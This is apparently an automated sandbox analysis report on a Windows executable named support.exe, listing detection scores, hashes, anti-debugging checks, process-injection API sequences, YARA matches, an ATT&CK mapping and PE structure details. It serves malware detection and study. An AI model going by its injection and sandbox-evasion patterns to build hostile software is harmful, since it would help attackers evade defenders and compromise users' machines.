Edit tour

Windows Analysis Report
support.exe

Overview

General Information

Sample Name:	support.exe
Analysis ID:	632531
MD5:	a2d24ba3b1c040105083109b9912e223
SHA1:	ad9daad3cdfbe1dacf4f077b98bb26f7af0854bd
SHA256:	348b351762c491c5d02cdfdf34d51faf67024f8f492ed46316d2adda6aac7412
Tags:	exe
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Contains functionality to inject threads in other processes

Machine Learning detection for sample

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Program does not show much activity (idle)

Classification

Process Tree

System is w10x64

support.exe (PID: 6060 cmdline: "C:\Users\user\Desktop\support.exe" MD5: A2D24BA3B1C040105083109B9912E223)

conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x76:$xo1: )\x15\x14\x0E]\x0D\x0F\x12\x1A\x0F\x1C\x10]\x1E\x1C\x13\x13\x12\x09]\x1F\x18]\x0F\x08\x13]\x14\x13]92.]\x10\x12\x19\x18
00000000.00000000.250484546.0000000000476000.00000008.00000001.01000000.00000003.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x7e76:$xo1: )\x15\x14\x0E]\x0D\x0F\x12\x1A\x0F\x1C\x10]\x1E\x1C\x13\x13\x12\x09]\x1F\x18]\x0F\x08\x13]\x14\x13]92.]\x10\x12\x19\x18
00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x7e76:$xo1: )\x15\x14\x0E]\x0D\x0F\x12\x1A\x0F\x1C\x10]\x1E\x1C\x13\x13\x12\x09]\x1F\x18]\x0F\x08\x13]\x14\x13]92.]\x10\x12\x19\x18
00000000.00000000.250216516.00000000003C5000.00000008.00000001.01000000.00000003.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x76:$xo1: )\x15\x14\x0E]\x0D\x0F\x12\x1A\x0F\x1C\x10]\x1E\x1C\x13\x13\x12\x09]\x1F\x18]\x0F\x08\x13]\x14\x13]92.]\x10\x12\x19\x18

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: support.exe	Virustotal: Detection: 60%	Perma Link
Source: support.exe	Metadefender: Detection: 23%	Perma Link
Source: support.exe	ReversingLabs: Detection: 68%

Machine Learning detection for sample

Source: support.exe

Joe Sandbox ML: detected

Source: support.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: support.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: support.exe

String found in binary or memory: (http://www.youtube.com/JamesPaddockMusic equals www.youtube.com (Youtube)

Source: support.exe	String found in binary or memory: http://vulpvibe.bandcamp.com/album/squaredance
Source: support.exe	String found in binary or memory: http://www.exrock.com
Source: support.exe	String found in binary or memory: http://www.netexplorers.com/member/midizone/
Source: support.exe	String found in binary or memory: http://www.youtube.com/JamesPaddockMusic

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003BCA60 memset,memset,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,memmove,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,

0_2_003BCA60

Source: support.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000000.00000000.250484546.0000000000476000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000000.00000000.250216516.00000000003C5000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =

Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B1050	0_2_003B1050
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B7C40	0_2_003B7C40
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B3520	0_2_003B3520
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B3B30	0_2_003B3B30
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003BA100	0_2_003BA100
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B6D60	0_2_003B6D60
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003BCDA0	0_2_003BCDA0
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B29D0	0_2_003B29D0
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B7610	0_2_003B7610
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B6F80	0_2_003B6F80

Source: support.exe	Virustotal: Detection: 60%
Source: support.exe	Metadefender: Detection: 23%
Source: support.exe	ReversingLabs: Detection: 68%

Source: support.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\support.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003B6C80 FindWindowA,Sleep,CreateToolhelp32Snapshot,memset,Process32First,Process32Next,Process32Next,CloseHandle,CloseHandle,

0_2_003B6C80

Source: unknown	Process created: C:\Users\user\Desktop\support.exe "C:\Users\user\Desktop\support.exe"
Source: C:\Users\user\Desktop\support.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003B7610 FindWindowA,Sleep,Sleep,Sleep,FindWindowA,FindWindowA,FindWindowA,FindWindowA,Sleep,GetWindowThreadProcessId,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,LoadLibraryA,GetProcAddress,SetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,

0_2_003B7610

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_01

Source: support.exe

String found in binary or memory: F-AdDdId A

Source: classification engine

Classification label: mal60.evad.winEXE@2/1@0/0

Source: support.exe

Static file information: File size 3431424 > 1048576

Source: support.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x331000

Source: support.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: support.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: support.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: support.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: support.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: support.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: support.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: support.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: support.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: support.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: support.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: support.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: support.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003BEDB6 push ecx; ret

0_2_003BEDC9

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003B7C40 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003B7C40

Source: C:\Users\user\Desktop\support.exe

0_2_003B7C40

Source: C:\Users\user\Desktop\support.exe

Window / User API: threadDelayed 896

Jump to behavior

Source: C:\Users\user\Desktop\support.exe TID: 276

Thread sleep time: -89600s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003B6560 GetModuleHandleA,IsDebuggerPresent,CheckRemoteDebuggerPresent,IsDebuggerPresent,GetModuleHandleA,CheckRemoteDebuggerPresent,IsDebuggerPresent,GetModuleHandleA,CheckRemoteDebuggerPresent,GetTickCount64,Sleep,

0_2_003B6560

Source: C:\Users\user\Desktop\support.exe

0_2_003B6560

Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B6620 mov eax, dword ptr fs:[00000030h]	0_2_003B6620
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B6450 mov eax, dword ptr fs:[00000030h]	0_2_003B6450
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B6450 mov eax, dword ptr fs:[00000030h]	0_2_003B6450
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003B64B0 mov eax, dword ptr fs:[00000030h]	0_2_003B64B0

Source: C:\Users\user\Desktop\support.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\support.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\support.exe

0_2_003B7C40

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003BF0FA SetUnhandledExceptionFilter,	0_2_003BF0FA
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003BEB6B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003BEB6B
Source: C:\Users\user\Desktop\support.exe	Code function: 0_2_003BEF95 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003BEF95

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003B66C0 Sleep,VirtualAllocEx,memset,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,VirtualFreeEx,VirtualFreeEx,WriteProcessMemory,CreateRemoteThread,VirtualFreeEx,VirtualFreeEx,CloseHandle,GetExitCodeProcess,GetExitCodeProcess,memset,ReadProcessMemory,Sleep,memset,WriteProcessMemory,malloc,memset,WriteProcessMemory,VirtualFreeEx,VirtualFreeEx,Sleep,

0_2_003B66C0

Source: C:\Users\user\Desktop\support.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003BEDEE cpuid

0_2_003BEDEE

Source: C:\Users\user\Desktop\support.exe

Code function: 0_2_003BF154 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_003BF154

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	1 Access Token Manipulation	2 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Access Token Manipulation	LSASS Memory	12 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
support.exe	60%	Virustotal		Browse
support.exe	24%	Metadefender		Browse
support.exe	68%	ReversingLabs	Win32.Trojan.GenericML
support.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.exrock.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://vulpvibe.bandcamp.com/album/squaredance	support.exe	false		high
http://www.youtube.com/JamesPaddockMusic	support.exe	false		high
http://www.exrock.com	support.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	632531
Start date and time: 23/05/202218:44:16	2022-05-23 18:44:16 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	support.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.evad.winEXE@2/1@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 82.2%) Quality average: 40.9% Quality standard deviation: 33.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 16 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.223.24.244
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\support.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	4.611012807958004
Encrypted:	false
SSDEEP:	3:XdfLOSyod4nQIBFBdCFfFW1aBQSIovWv/tptE1nwobWyFuQyAov0:tB8xFB2fwamsOHt2WyFfye
MD5:	639D4A73EA7C12736FD64208AA50CBAA
SHA1:	8CFB31975C3EBF3EB4E31F8A827D832C80EDFE61
SHA-256:	A2BE64267B36E4AEDFDE03124CAB323AB6A998FDC6F4F99287B0459F7DF5EC29
SHA-512:	E2A0AD3BA1C86A46862FF6E24F8FE46C9990D0B6D9B9769EE623E631FA635A12DECD6CE3B5D62183BA706B3A000F1AE25C71AD7F09A52241BAB625A25E2CDBBA
Malicious:	false
Reputation:	low
Preview:	- Status (Unknown) -.. - Build date (Dec 27 2021) -.. - Product -.... 1) PPHUD.. 2) PPHUD Alpha.. 3) Music box.... >

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.833608978635711
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	support.exe
File size:	3431424
MD5:	a2d24ba3b1c040105083109b9912e223
SHA1:	ad9daad3cdfbe1dacf4f077b98bb26f7af0854bd
SHA256:	348b351762c491c5d02cdfdf34d51faf67024f8f492ed46316d2adda6aac7412
SHA512:	6482efb73080840fde2e26e3137243dc73dcb12bd48db9722280c4f093e257afe65af91a2a1d7c83d8b0829b8933e05c0dfbfbf89d83021d329372e89f865c5f
SSDEEP:	49152:fym8dnvafFKnfyWDx2O52V3LZ4WtgDkPXqJ5O/srX3LochcQBPBPPhZBPBPPhZBn:6m8dvafFKfP93MF4WeDeX0oU0Qc
TLSH:	93F58D65025ABFE8CE37A5F110B6DF1E71E075FA4439AAAC4C95D4F173A00608C35AAF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ..c ... ...!... ...!... ...!... ...!... ...!... ... ... u..!... u.. ... u..!... Rich... ........PE..L...$..a...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x40eb61
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C9B824 [Mon Dec 27 12:57:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	9f9653573673d8f6615fcab81ba51787

Entrypoint Preview

Instruction
call 00007F57D4F9C710h
jmp 00007F57D4F9BF49h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [00411090h]
push dword ptr [ebp+08h]
call dword ptr [0041108Ch]
push C0000409h
call dword ptr [0041102Ch]
push eax
call dword ptr [00411094h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F57D4F9C8B3h
test eax, eax
je 00007F57D4F9C0D7h
push 00000002h
pop ecx
int 29h
mov dword ptr [007460A0h], eax
mov dword ptr [0074609Ch], ecx
mov dword ptr [00746098h], edx
mov dword ptr [00746094h], ebx
mov dword ptr [00746090h], esi
mov dword ptr [0074608Ch], edi
mov word ptr [007460B8h], ss
mov word ptr [007460ACh], cs
mov word ptr [00746088h], ds
mov word ptr [00746084h], es
mov word ptr [00746080h], fs
mov word ptr [0074607Ch], gs
pushfd
pop dword ptr [007460B0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [007460A4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [007460A8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [007460B4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00745FF0h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1375c	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x347000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x348000	0xf00	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x12040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x12118	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x12078	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf441	0xf600	False	0.507637830285	data	6.47898584689	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x3e9c	0x4000	False	0.454711914062	data	5.62734968604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x15000	0x3313a4	0x331000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x347000	0x1e8	0x200	False	0.5390625	data	4.7720374017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x348000	0xf00	0x1000	False	0.791748046875	data	6.50058963945	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x347060	0x188	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	GetStdHandle, CreateToolhelp32Snapshot, Sleep, Process32Next, CloseHandle, FillConsoleOutputAttribute, SetConsoleCursorPosition, GetCurrentProcess, GetModuleHandleA, GetTickCount64, LoadLibraryA, SetConsoleTitleA, GetProcAddress, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, Module32Next, Module32First, GetExitCodeProcess, WaitForSingleObject, SetEvent, CreateEventA, GetModuleFileNameA, GetConsoleScreenBufferInfo, Process32First, CreateThread, FillConsoleOutputCharacterA, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, CreateEventW, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead
ADVAPI32.dll	LookupPrivilegeValueA, OpenProcessToken, AdjustTokenPrivileges
MSVCP140.dll	?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ, ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z, ?getloc@ios_base@std@@QBE?AVlocale@2@XZ, ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, ??Bid@locale@std@@QAEIXZ, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z, ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z, ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ, ?always_noconv@codecvt_base@std@@QBE_NXZ, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z, ??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@H@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ, ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z, 